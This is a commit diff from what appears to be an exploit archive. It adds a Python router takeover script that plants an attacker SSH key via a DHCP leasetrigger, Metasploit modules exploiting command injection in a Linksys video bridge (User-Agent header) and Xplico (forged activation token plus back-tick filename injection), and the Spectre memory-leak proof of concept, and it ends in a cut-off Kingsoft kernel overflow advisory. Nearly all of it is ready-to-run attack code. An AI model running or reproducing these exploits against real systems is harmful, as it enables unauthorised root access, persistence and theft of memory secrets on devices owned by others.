DB: 2018-01-05
5 changes to exploits/shellcodes Multiple CPUs - 'Spectre' Information Disclosure (PoC) Iopsys Router - 'dhcp' Remote Code Execution Linksys WVBR0-25 - User-Agent Command Execution (Metasploit) Xplico - Remote Code Execution (Metasploit)
This commit is contained in:
parent
3eec0e4999
commit
b768a6ef6c
6 changed files with 843 additions and 24 deletions
152
exploits/hardware/remote/43428.py
Executable file
152
exploits/hardware/remote/43428.py
Executable file
|
@ -0,0 +1,152 @@
|
|||
#!/usr/bin/python
|
||||
|
||||
import json
|
||||
import sys
|
||||
import subprocess
|
||||
import socket
|
||||
import os
|
||||
from time import sleep
|
||||
from websocket import create_connection
|
||||
|
||||
def ubusAuth(host, username, password):
|
||||
ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])
|
||||
req = json.dumps({"jsonrpc":"2.0","method":"call",
|
||||
"params":["00000000000000000000000000000000","session","login",
|
||||
{"username": username,"password":password}],
|
||||
"id":666})
|
||||
ws.send(req)
|
||||
response = json.loads(ws.recv())
|
||||
ws.close()
|
||||
try:
|
||||
key = response.get('result')[1].get('ubus_rpc_session')
|
||||
except IndexError:
|
||||
return(None)
|
||||
return(key)
|
||||
|
||||
def ubusCall(host, key, namespace, argument, params={}):
|
||||
ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])
|
||||
req = json.dumps({"jsonrpc":"2.0","method":"call",
|
||||
"params":[key,namespace,argument,params],
|
||||
"id":666})
|
||||
ws.send(req)
|
||||
response = json.loads(ws.recv())
|
||||
ws.close()
|
||||
try:
|
||||
result = response.get('result')[1]
|
||||
except IndexError:
|
||||
if response.get('result')[0] == 0:
|
||||
return(True)
|
||||
return(None)
|
||||
return(result)
|
||||
|
||||
if __name__ == "__main__":
|
||||
host = "192.168.1.1"
|
||||
payload = """
|
||||
#!/bin/sh
|
||||
/bin/echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAkQMU/2HyXNEJ8gZbkxrvLnpSZ4Xz+Wf3QhxXdQ5blDI5IvDkoS4jHoi5XKYHevz8YiaX8UYC7cOBrJ1udp/YcuC4GWVV5TET449OsHBD64tgOSV+3s5r/AJrT8zefJbdc13Fx/Bnk+bovwNS2OTkT/IqYgy9n+fKKkSCjQVMdTTrRZQC0RpZ/JGsv2SeDf/iHRa71keIEpO69VZqPjPVFQfj1QWOHdbTRQwbv0MJm5rt8WTKtS4XxlotF+E6Wip1hbB/e+y64GJEUzOjT6BGooMu/FELCvIs2Nhp25ziRrfaLKQY1XzXWaLo4aPvVq05GStHmTxb+r+WiXvaRv1cbQ== rsa-key-20170427" > /etc/dropbear/authorized_keys
|
||||
/usr/sbin/odhcpd-update
|
||||
exit 0
|
||||
"""
|
||||
|
||||
print("Authenticating...")
|
||||
key = ubusAuth(host, "user", "password")
|
||||
if (not key):
|
||||
print("Auth failed!")
|
||||
sys.exit(1)
|
||||
print("Got key: %s" % key)
|
||||
|
||||
print("Adding Samba share...")
|
||||
smbcheck = json.dumps(ubusCall(host, key, "uci", "get",
|
||||
{"config":"samba"}))
|
||||
if ("pwned" in smbcheck):
|
||||
print("Samba share seems to already exist, skipping")
|
||||
else:
|
||||
smba = ubusCall(host, key, "uci", "add",
|
||||
{"config":"samba", "type":"sambashare", "values":
|
||||
{"name":"pwned", "read_only":"no", "create_mask":"0775", "dir_mask":"0775",
|
||||
"path":"/mnt/", "guest_ok":"yes"}})
|
||||
if (not smba):
|
||||
print("Adding Samba share failed!")
|
||||
sys.exit(1)
|
||||
|
||||
print("Enabling Samba...")
|
||||
smbe = ubusCall(host, key, "uci", "set",
|
||||
{"config":"samba", "type":"samba", "values":
|
||||
{"interface":"lan"}})
|
||||
if (not smbe):
|
||||
print("Enabling Samba failed!")
|
||||
sys.exit(1)
|
||||
|
||||
print("Committing changes...")
|
||||
smbc = ubusCall(host, key, "uci", "commit",
|
||||
{"config":"samba"})
|
||||
if (not smbc):
|
||||
print("Committing changes failed!")
|
||||
sys.exit(1)
|
||||
|
||||
print("Setting malicious leasetrigger...")
|
||||
lts = ubusCall(host, key, "uci", "set",
|
||||
{"config":"dhcp", "type":"odhcpd", "values":
|
||||
{"leasetrigger":"/mnt/pwn.sh"}})
|
||||
if (not lts):
|
||||
print("Setting leasetrigger failed!")
|
||||
sys.exit(1)
|
||||
|
||||
print("Committing changes...")
|
||||
ltc = ubusCall(host, key, "uci", "commit",
|
||||
{"config":"dhcp"})
|
||||
if (not ltc):
|
||||
print("Committing changes failed!")
|
||||
sys.exit(1)
|
||||
|
||||
print("Rebooting system...")
|
||||
reb = ubusCall(host, key, "juci.system", "reboot")
|
||||
if (not reb):
|
||||
print("Rebooting failed, try rebooting manually!")
|
||||
sys.exit(1)
|
||||
|
||||
print("Waiting on reboot...")
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
isUp = None
|
||||
while (not isUp):
|
||||
try:
|
||||
sleep(10)
|
||||
s.connect((host, 8080))
|
||||
isUp = True
|
||||
s.close()
|
||||
except:
|
||||
pass
|
||||
|
||||
print("Creating temp file for payload...")
|
||||
with open(".payload.tmp","a+") as file:
|
||||
file.write(payload)
|
||||
path = os.path.realpath(file.name)
|
||||
|
||||
print("Dropping payload...")
|
||||
subprocess.run(r"smbclient \\\\%s\\pwned p -c 'put %s pwn.sh'" % (host, path),
|
||||
shell=True, check=True)
|
||||
print("Payload dropped")
|
||||
|
||||
print("Authenticating...")
|
||||
key = ubusAuth(host, "user", "password")
|
||||
if (not key):
|
||||
print("Auth failed!")
|
||||
sys.exit(1)
|
||||
print("Got key: %s" % key)
|
||||
|
||||
print("Executing payload")
|
||||
eec = ubusCall(host, key, "juci.service", "stop",
|
||||
{"name":"odhcpd"})
|
||||
if (not eec):
|
||||
print("Stopping odhcpd failed!")
|
||||
sys.exit(1)
|
||||
ees = ubusCall(host, key, "juci.service", "start",
|
||||
{"name":"odhcpd"})
|
||||
if (not ees):
|
||||
print("Starting odhcpd failed!")
|
||||
sys.exit(1)
|
||||
|
||||
print("Cleaning up...")
|
||||
os.remove(path)
|
||||
|
||||
print("Exploitation complete")
|
118
exploits/hardware/remote/43429.rb
Executable file
118
exploits/hardware/remote/43429.rb
Executable file
|
@ -0,0 +1,118 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Linksys WVBR0-25 User-Agent Command Execution',
|
||||
'Description' => %q{
|
||||
The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to connect wireless Genie
|
||||
cable boxes to the Genie DVR, is vulnerable to OS command injection in version < 1.0.41
|
||||
of the web management portal via the User-Agent header. Authentication is not required to
|
||||
exploit this vulnerability.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'HeadlessZeke' # Vulnerability discovery and Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2017-17411'],
|
||||
['ZDI', '17-973'],
|
||||
['URL', 'https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair']
|
||||
],
|
||||
'DisclosureDate' => 'Dec 13 2017',
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true,
|
||||
'Space' => 1024,
|
||||
'Compat' =>
|
||||
{
|
||||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'generic netcat'
|
||||
}
|
||||
},
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Targets' => [[ 'Automatic', { }]],
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
end
|
||||
|
||||
def check
|
||||
check_str = rand_text_alpha(8)
|
||||
begin
|
||||
res = send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => '/',
|
||||
'agent' => "\"; printf \"#{check_str}"
|
||||
})
|
||||
if res && res.code == 200 && res.body.to_s.include?(Rex::Text.md5(check_str))
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("#{peer} - Trying to access the device ...")
|
||||
|
||||
unless check == Exploit::CheckCode::Vulnerable
|
||||
fail_with(Failure::NotVulnerable, "#{peer} - Failed to access the vulnerable device")
|
||||
end
|
||||
|
||||
print_status("#{peer} - Exploiting...")
|
||||
|
||||
if datastore['PAYLOAD'] == 'cmd/unix/generic'
|
||||
exploit_cmd
|
||||
else
|
||||
exploit_session
|
||||
end
|
||||
end
|
||||
|
||||
def exploit_cmd
|
||||
beg_boundary = rand_text_alpha(8)
|
||||
|
||||
begin
|
||||
res = send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => '/',
|
||||
'agent' => "\"; echo #{beg_boundary}; #{payload.encoded} #"
|
||||
})
|
||||
|
||||
if res && res.code == 200 && res.body.to_s =~ /#{beg_boundary}/
|
||||
print_good("#{peer} - Command sent successfully")
|
||||
if res.body.to_s =~ /ret :.+?#{beg_boundary}(.*)/ # all output ends up on one line
|
||||
print_status("#{peer} - Command output: #{$1}")
|
||||
end
|
||||
else
|
||||
fail_with(Failure::UnexpectedReply, "#{peer} - Command execution failed")
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
|
||||
end
|
||||
end
|
||||
|
||||
def exploit_session
|
||||
begin
|
||||
send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => '/',
|
||||
'agent' => "\"; #{payload.encoded} #"
|
||||
})
|
||||
rescue ::Rex::ConnectionError
|
||||
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
|
||||
end
|
||||
end
|
||||
end
|
359
exploits/linux/remote/43430.rb
Executable file
359
exploits/linux/remote/43430.rb
Executable file
|
@ -0,0 +1,359 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'Xplico Remote Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits command injection vulnerability. Unauthenticated users can register a new account and then execute a terminal
|
||||
command under the context of the root user.
|
||||
|
||||
The specific flaw exists within the Xplico, which listens on TCP port 9876 by default. The goal of Xplico is extract from an internet
|
||||
traffic capture the applications data contained. There is a hidden end-point at inside of the Xplico that allow anyone to create
|
||||
a new user. Once the user created through /users/register endpoint, it must be activated via activation e-mail. After the registration Xplico try
|
||||
to send e-mail that contains activation code. Unfortunetly, this e-mail probably not gonna reach to the given e-mail address on most of installation.
|
||||
But it's possible to calculate exactly same token value because of insecure cryptographic random string generator function usage.
|
||||
|
||||
One of the feature of Xplico is related to the parsing PCAP files. Once PCAP file uploaded, Xplico execute an operating system command in order to calculate checksum
|
||||
of the file. Name of the for this operation is direclty taken from user input and then used at inside of the command without proper input validation.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2017-16666'],
|
||||
['URL', 'https://pentest.blog/advisory-xplico-unauthenticated-remote-code-execution-cve-2017-16666/'],
|
||||
['URL', 'https://www.xplico.org/archives/1538']
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Platform' => ['unix'],
|
||||
'Arch' => ARCH_CMD,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'RPORT' => 9876
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 252,
|
||||
'DisableNops' => true,
|
||||
'BadChars' => "\x2f\x22",
|
||||
'Compat' =>
|
||||
{
|
||||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'generic netcat gawk', # other cmd payloads can't fit within 252 space due to badchars.
|
||||
},
|
||||
},
|
||||
'Targets' => [ ['Automatic', {}] ],
|
||||
'DisclosureDate' => 'Oct 29 2017',
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
end
|
||||
|
||||
def check
|
||||
# There is no exact way to understand validity of vulnerability without registering new user as well as trigger the command injection.
|
||||
# which is not something we want to do for only check..!
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'users', 'register'),
|
||||
)
|
||||
if res && res.code == 302
|
||||
Exploit::CheckCode::Safe
|
||||
else
|
||||
Exploit::CheckCode::Unknown
|
||||
end
|
||||
end
|
||||
|
||||
def initiate_session
|
||||
print_status('Initiating new session on server side')
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'users', 'login'),
|
||||
)
|
||||
if res && res.code == 200
|
||||
res.get_cookies
|
||||
else
|
||||
nil
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def register_user(username, password)
|
||||
# First thing first, we need to get csrf token from registration form.
|
||||
print_status('Registering a new user')
|
||||
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'users', 'register'),
|
||||
'cookie' => @cookie
|
||||
)
|
||||
|
||||
if res && res.code == 200
|
||||
csrf_token = res.get_hidden_inputs.first['data[_Token][key]'] || nil
|
||||
fields = res.get_hidden_inputs.first['data[_Token][fields]'] || nil
|
||||
end
|
||||
|
||||
if csrf_token.nil? || fields.nil?
|
||||
fail_with(Failure::Unknown, 'Unable to extact hidden fields from registration form.')
|
||||
end
|
||||
|
||||
# rand_mail_address sometimes generates buggy email address for this app. So we manually generate email address in here.
|
||||
email = ''
|
||||
email << rand_text_alpha_lower(rand(10)+4)
|
||||
email << '@'
|
||||
email << rand_text_alpha_lower(rand(10)+4)
|
||||
email << '.'
|
||||
email << rand_text_alpha_lower(rand(1)+2)
|
||||
|
||||
# Create user
|
||||
res = send_request_cgi(
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'users', 'register'),
|
||||
'cookie' => @cookie,
|
||||
'vars_post' => {
|
||||
'_method' => 'POST',
|
||||
'data[_Token][key]' => csrf_token,
|
||||
'data[User][email]' => email,
|
||||
'data[User][username]' => username,
|
||||
'data[User][password]' => password,
|
||||
'data[_Token][fields]' => fields,
|
||||
'data[_Token][unlocked]' => '',
|
||||
}
|
||||
)
|
||||
|
||||
if res && res.code == 302
|
||||
print_good('New user successfully registered')
|
||||
print_status("Username: #{username}")
|
||||
print_status("Password: #{password}")
|
||||
else
|
||||
fail_with(Failure::Unknown, 'Could not register new user')
|
||||
end
|
||||
|
||||
# Awesome. We have user. We need to activate it manually..!
|
||||
print_status('Calculating em_key code of the user')
|
||||
|
||||
unixtime = Time.parse(res.headers['Date']).to_i
|
||||
password_md5 = Rex::Text.md5(password)
|
||||
em_key = Rex::Text.md5(
|
||||
"#{email}#{password_md5}#{unixtime}"
|
||||
)
|
||||
print_status("Activating user with em_key = #{em_key}")
|
||||
|
||||
# We need to follow redirections. Even if we managed to find em_key.
|
||||
# It will redirect us to the login form. We need to see registration completed on final page.
|
||||
res = send_request_cgi!(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'users', 'registerConfirm', em_key),
|
||||
'cookie' => @cookie
|
||||
)
|
||||
|
||||
if res && res.code == 200 && res.body.include?('Registration Completed.')
|
||||
print_good('User successfully activated')
|
||||
else
|
||||
fail_with(Failure::Unknown, 'Could not activated our user. Target may not be vulnerable.')
|
||||
end
|
||||
end
|
||||
|
||||
def login(username, password)
|
||||
# yet another csrf token gathering.
|
||||
print_status('Authenticating with our activated new user')
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'users', 'login'),
|
||||
'cookie' => @cookie
|
||||
)
|
||||
|
||||
if res && res.code == 200
|
||||
csrf_token = res.get_hidden_inputs.first['data[_Token][key]'] || nil
|
||||
fields = res.get_hidden_inputs.first['data[_Token][fields]'] || nil
|
||||
end
|
||||
|
||||
if csrf_token.nil? || fields.nil?
|
||||
fail_with(Failure::Unknown, 'Unable to extact hidden fields from login form.')
|
||||
end
|
||||
|
||||
res = send_request_cgi!(
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'users', 'login'),
|
||||
'cookie' => @cookie,
|
||||
'vars_post' => {
|
||||
'_method' => 'POST',
|
||||
'data[_Token][key]' => csrf_token,
|
||||
'data[User][username]' => username,
|
||||
'data[User][password]' => password,
|
||||
'data[_Token][fields]' => fields,
|
||||
'data[_Token][unlocked]' => '',
|
||||
}
|
||||
)
|
||||
|
||||
if res && res.body.include?('<a href="/pols">Cases</a>')
|
||||
print_good('Successfully authenticated')
|
||||
else
|
||||
fail_with(Failure::Unknown, 'Unable to login.')
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def create_new_case
|
||||
# We logged in. Not we need to create a new xplico case.
|
||||
print_status('Creating new case')
|
||||
pol_name = rand_text_alpha_lower(rand(4)+8)
|
||||
res = send_request_cgi!(
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'pols', 'add'),
|
||||
'cookie' => @cookie,
|
||||
'vars_post' => {
|
||||
'_method' => 'POST',
|
||||
'data[Capture][Type]' => 0,
|
||||
'data[Pol][name]' => pol_name,
|
||||
'data[Pol][external_ref]' => '',
|
||||
}
|
||||
)
|
||||
|
||||
if res && res.body.include?('The Case has been created')
|
||||
res.body.scan(/<a href="\/pols\/view\/([0-9]+)">/).flatten[0]
|
||||
else
|
||||
nil
|
||||
end
|
||||
end
|
||||
|
||||
def create_new_sol(pol_id)
|
||||
# Since we xplico case, it's time to create a "session" for this case.
|
||||
print_status('Creating new xplico session for pcap')
|
||||
|
||||
sol_name = rand_text_alpha_lower(rand(4)+8)
|
||||
# sols/add endpoint reads selected case id through session.
|
||||
# So we need to hit that end-point so we can insert pol_id into the current session data.
|
||||
send_request_cgi!(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'pols', 'view', pol_id),
|
||||
'cookie' => @cookie,
|
||||
)
|
||||
|
||||
# Creating new session.
|
||||
res = send_request_cgi!(
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'sols', 'add'),
|
||||
'cookie' => @cookie,
|
||||
'vars_post' => {
|
||||
'_method' => 'POST',
|
||||
'data[Sol][name]' => sol_name,
|
||||
}
|
||||
)
|
||||
|
||||
if res && res.body.include?('The Session has been created')
|
||||
res.body.scan(/<a href="\/sols\/view\/([0-9]+)">/).flatten[0]
|
||||
else
|
||||
nil
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def upload_pcap(sol_id)
|
||||
print_status('Uploading malformed PCAP file')
|
||||
# We are hitting this end-point so we can access sol_id through session on server-side.
|
||||
send_request_cgi!(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'sols', 'view', sol_id),
|
||||
'cookie' => @cookie,
|
||||
)
|
||||
|
||||
# Reading malformed pcap files.
|
||||
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2017-16666', 'dump.pcap')
|
||||
fd = ::File.open( path, 'rb')
|
||||
pcap = fd.read(fd.stat.size)
|
||||
fd.close
|
||||
|
||||
data = Rex::MIME::Message.new
|
||||
data.add_part('POST', nil, nil, 'form-data; name="_method"')
|
||||
data.add_part(pcap, 'application/octet-stream', nil, "form-data; name=\"data[Sols][File]\"; filename=\"`#{payload.encoded})`\"") # Yes back-tick injection!
|
||||
|
||||
# Uploading PCAP file.
|
||||
res = send_request_cgi(
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'sols', 'pcap'),
|
||||
'cookie' => @cookie,
|
||||
'ctype' => "multipart/form-data; boundary=#{data.bound}",
|
||||
'data' => data.to_s
|
||||
)
|
||||
|
||||
if res && res.code == 302
|
||||
print_good('PCAP successfully uploaded. Pcap parser is going to start on server side.')
|
||||
end
|
||||
|
||||
# We can not wait all the day long to have session.
|
||||
# So we are checking status of decoding process 5 times with sleep for a 1 second on each loop.
|
||||
is_job_done = nil
|
||||
counter = 0
|
||||
until session_created? || !is_job_done.nil? || counter == 5
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'sols', 'view', sol_id),
|
||||
'cookie' => @cookie,
|
||||
)
|
||||
if res && res.body.include?('File uploaded, wait start decoding...')
|
||||
print_status('Parsing has started. Wait for parser to get the job done...')
|
||||
end
|
||||
if res && res.body.include?('DECODING')
|
||||
print_good('We are at PCAP decoding phase. Little bit more patience...')
|
||||
end
|
||||
# Tbh decoding process is not going to be finished as long as we have msf session.
|
||||
# We are not going to see this case if we are successful exploiting.
|
||||
if res && res.body.include?('DECODING COMPLETED')
|
||||
print_warning('PCAP parsing process has finished. Haven\'t you got your shell ?')
|
||||
is_job_done = 1
|
||||
next
|
||||
end
|
||||
sleep(1)
|
||||
counter += 1
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
if check == Exploit::CheckCode::Safe
|
||||
fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable")
|
||||
end
|
||||
|
||||
# We need to access cookie from everywhere. Thus making it global variable.
|
||||
@cookie = initiate_session
|
||||
if @cookie.nil?
|
||||
fail_with(Failure::Unknown, 'Unable to initiate new sessionid on server.')
|
||||
end
|
||||
|
||||
# We only need to access username and password for login func. Let's leave them as a local variables.
|
||||
password = rand_text_alpha(32)
|
||||
username = rand_text_alpha_lower(rand(8)+8)
|
||||
register_user(username, password)
|
||||
login(username, password)
|
||||
|
||||
# We will need to have pol_id for creating new xplico session.
|
||||
pol_id = create_new_case
|
||||
if pol_id.nil?
|
||||
fail_with(Failure::Unknown, 'Unable to create New Case.')
|
||||
end
|
||||
print_good("New Case successfully creted. Our pol_id = #{pol_id}")
|
||||
|
||||
# Create xplico session by using pol_id
|
||||
sol_id = create_new_sol(pol_id)
|
||||
if sol_id.nil?
|
||||
fail_with(Failure::Unknown, 'Unable to create New Sol.')
|
||||
end
|
||||
print_good("New Sols successfully creted. Our sol_id = #{sol_id}")
|
||||
|
||||
# Uploading malformed PCAP file. We are exploiting authenticated cmd inj in here.
|
||||
upload_pcap(sol_id)
|
||||
|
||||
end
|
||||
end
|
124
exploits/multiple/local/43427.c
Normal file
124
exploits/multiple/local/43427.c
Normal file
|
@ -0,0 +1,124 @@
|
|||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdint.h>
|
||||
#ifdef _MSC_VER
|
||||
#include <intrin.h> /* for rdtscp and clflush */
|
||||
#pragma optimize("gt",on)
|
||||
#else
|
||||
#include <x86intrin.h> /* for rdtscp and clflush */
|
||||
#endif
|
||||
|
||||
/********************************************************************
|
||||
Victim code.
|
||||
********************************************************************/
|
||||
unsigned int array1_size = 16;
|
||||
uint8_t unused1[64];
|
||||
uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };
|
||||
uint8_t unused2[64];
|
||||
uint8_t array2[256 * 512];
|
||||
|
||||
char *secret = "The Magic Words are Squeamish Ossifrage.";
|
||||
|
||||
uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */
|
||||
|
||||
void victim_function(size_t x) {
|
||||
if (x < array1_size) {
|
||||
temp &= array2[array1[x] * 512];
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
/********************************************************************
|
||||
Analysis code
|
||||
********************************************************************/
|
||||
#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */
|
||||
|
||||
/* Report best guess in value[0] and runner-up in value[1] */
|
||||
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {
|
||||
static int results[256];
|
||||
int tries, i, j, k, mix_i, junk = 0;
|
||||
size_t training_x, x;
|
||||
register uint64_t time1, time2;
|
||||
volatile uint8_t *addr;
|
||||
|
||||
for (i = 0; i < 256; i++)
|
||||
results[i] = 0;
|
||||
for (tries = 999; tries > 0; tries--) {
|
||||
|
||||
/* Flush array2[256*(0..255)] from cache */
|
||||
for (i = 0; i < 256; i++)
|
||||
_mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */
|
||||
|
||||
/* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
|
||||
training_x = tries % array1_size;
|
||||
for (j = 29; j >= 0; j--) {
|
||||
_mm_clflush(&array1_size);
|
||||
for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */
|
||||
|
||||
/* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
|
||||
/* Avoid jumps in case those tip off the branch predictor */
|
||||
x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
|
||||
x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
|
||||
x = training_x ^ (x & (malicious_x ^ training_x));
|
||||
|
||||
/* Call the victim! */
|
||||
victim_function(x);
|
||||
}
|
||||
|
||||
/* Time reads. Order is lightly mixed up to prevent stride prediction */
|
||||
for (i = 0; i < 256; i++) {
|
||||
mix_i = ((i * 167) + 13) & 255;
|
||||
addr = &array2[mix_i * 512];
|
||||
time1 = __rdtscp(&junk); /* READ TIMER */
|
||||
junk = *addr; /* MEMORY ACCESS TO TIME */
|
||||
time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
|
||||
if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
|
||||
results[mix_i]++; /* cache hit - add +1 to score for this value */
|
||||
}
|
||||
|
||||
/* Locate highest & second-highest results results tallies in j/k */
|
||||
j = k = -1;
|
||||
for (i = 0; i < 256; i++) {
|
||||
if (j < 0 || results[i] >= results[j]) {
|
||||
k = j;
|
||||
j = i;
|
||||
} else if (k < 0 || results[i] >= results[k]) {
|
||||
k = i;
|
||||
}
|
||||
}
|
||||
if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
|
||||
break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
|
||||
}
|
||||
results[0] ^= junk; /* use junk so code above won’t get optimized out*/
|
||||
value[0] = (uint8_t)j;
|
||||
score[0] = results[j];
|
||||
value[1] = (uint8_t)k;
|
||||
score[1] = results[k];
|
||||
}
|
||||
|
||||
int main(int argc, const char **argv) {
|
||||
size_t malicious_x=(size_t)(secret-(char*)array1); /* default for malicious_x */
|
||||
int i, score[2], len=40;
|
||||
uint8_t value[2];
|
||||
|
||||
for (i = 0; i < sizeof(array2); i++)
|
||||
array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
|
||||
if (argc == 3) {
|
||||
sscanf(argv[1], "%p", (void**)(&malicious_x));
|
||||
malicious_x -= (size_t)array1; /* Convert input value into a pointer */
|
||||
sscanf(argv[2], "%d", &len);
|
||||
}
|
||||
|
||||
printf("Reading %d bytes:\n", len);
|
||||
while (--len >= 0) {
|
||||
printf("Reading at malicious_x = %p... ", (void*)malicious_x);
|
||||
readMemoryByte(malicious_x++, value, score);
|
||||
printf("%s: ", (score[0] >= 2*score[1] ? "Success" : "Unclear"));
|
||||
printf("0x%02X=’%c’ score=%d ", value[0],
|
||||
(value[0] > 31 && value[0] < 127 ? value[0] : ’?’), score[0]);
|
||||
if (score[1] > 0)
|
||||
printf("(second best: 0x%02X score=%d)", value[1], score[1]);
|
||||
printf("\n");
|
||||
}
|
||||
return (0);
|
||||
}
|
|
@ -1,25 +1,20 @@
|
|||
'''
|
||||
Vulnerability Summary
|
||||
The following advisory describes a kernel stack buffer overflow that leads to privilege escalation found in Kingsoft Antivirus/Internet Security 9+.
|
||||
"""
|
||||
Kingsoft Antivirus/Internet Security 9+ Kernel Stack Buffer Overflow Privilege Escalation Vulnerability
|
||||
Anti-Virus: http://www.kingsoft.co/downloads/kav/KAV100720_ENU_DOWN_331020_10.rar
|
||||
Internet Security: http://www.kingsoft.co/downloads/kis/kis.rar
|
||||
|
||||
Kingsoft Antivirus “provides effective and efficient protection solution at no cost to users. It applies cloud security technology to monitor, scan and protect your systems without any worrying. The comprehensive defender and anti-virus tools prevent and protect your computer from unwanted virus, worms, and Trojans. With the simplest and easiest-to-use functions, users find themselves no difficulty to handle Kingsoft Antivirus.”
|
||||
Summary:
|
||||
========
|
||||
|
||||
Credit
|
||||
An independent security researcher, Steven Seeley, has reported this vulnerabilities to Beyond Security’s SecuriTeam Secure Disclosure program
|
||||
This vulnerability allows local attackers to escalate privileges on vulnerable installations of Kingsoft Internet Security. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaws exists within the processing of IOCTL 0x80030004 or 0x80030008 by the KWatch3.sys (internet security) kernel driver. The issue lies in the failure to properly validate user-supplied data which can result in a kernel stack buffer overflow. An attacker can leverage this vulnerability to execute arbitrary code under the context of kernel.
|
||||
|
||||
Vendor response
|
||||
We tried to contact Kingsoft since October 8 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for these vulnerability.
|
||||
Vulnerability Analysis:
|
||||
=======================
|
||||
|
||||
Vulnerability details
|
||||
